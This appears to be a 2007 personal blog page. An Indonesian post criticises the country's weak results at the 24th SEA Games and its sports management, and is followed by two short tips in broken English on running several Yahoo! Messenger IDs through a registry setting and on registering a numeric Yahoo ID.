Tapi beberapa SEA Games terakhir olahraga kita begitu memprihatinkan, kita lihat saja SEA Games ke 24 yang diadakan di Thailand sekarang ini, makin memperlihatkan betapa memprihatinkannya olahraga di negara kita. Diawal-awal perolehan medali begitu terseok-seok seperti anak bayi yang baru belajar jalan, bahkan dengan Vietnam yang dulunya tidak ada apa-apanya dibanding atlet-atlet kita, mereka sudah jauh lebih banyak perolehan mendalinya.
Dimanakah letak kesalahan dalam pembinaan atlet-atlet kita, manajemenkah atau bonus yang diberikan kurang besar atau bisa jadi para atlit berpikir jika mereka mendapatkan bonus takut dipotong sana-sini sehingga mereka menjadi bimbang? tidak sedikit cabang-cabang olahraga yang mengirim atlitnya untuk berlatih ke luar negeri. Kita contohkan sepakbola, mereka berlatih tanding dengan tim-tim dari luar negara kita, tapi apa hasilnya, bahkan hasil yang didapat jauh dari apa yang diharapkan.
Dari hasil yang didapat sekarang ini semoga KONI yang memayungi cabang-cabang olahraga di negara kita tercinta, memperhatikan lebih baik lagi sehingga hasil yang didapat pun lebih baik lagi. Para atlit kita bukan hanya membutuhkan latihan fisik saja, tapi mental juara mereka juga harus dilatih dengan melibatkan psikiater sehingga dalam bertanding mereka tidak gugup atau demam lapangan. Dan ada baiknya juga KONI membersihkan pengurus-pengurus cabang olahraga kita yang masih "nakal", masa iya sebuah cabang olahraga dengan peminat paling besar di pimpin oleh seseorang dari balik jeruji besi, Apa Kata Dunia?
Walau bagaimanapun mari kita sama-sama berdoa semoga atlit-atlit kita bisa berjaya dimasa depan.

13 December 2007

Yahoo!Messenger Multi ID

do you know that is moment chating use yahoo! messengger can use more than 1 id. . . . this the trick. . . . without software or tools addition. . . .

  1. click start > run… > cmd
  2. choose tree hkey_current_user > software > yahoo > fence > test
  3. in panel right side, click right > new > dword value
  4. give name plural in key and 1 in value

07 December 2007

Yahoo!Messenger Unique ID

link to make id number

under these is tricks make id number


use navigation button likes within reason you use button in handphone by using mouse



choose no i don't




skip




find and choose sign in




input number you want and then submit, then password contents etc like you make id




verification code input




congratulation you have made id number. . . .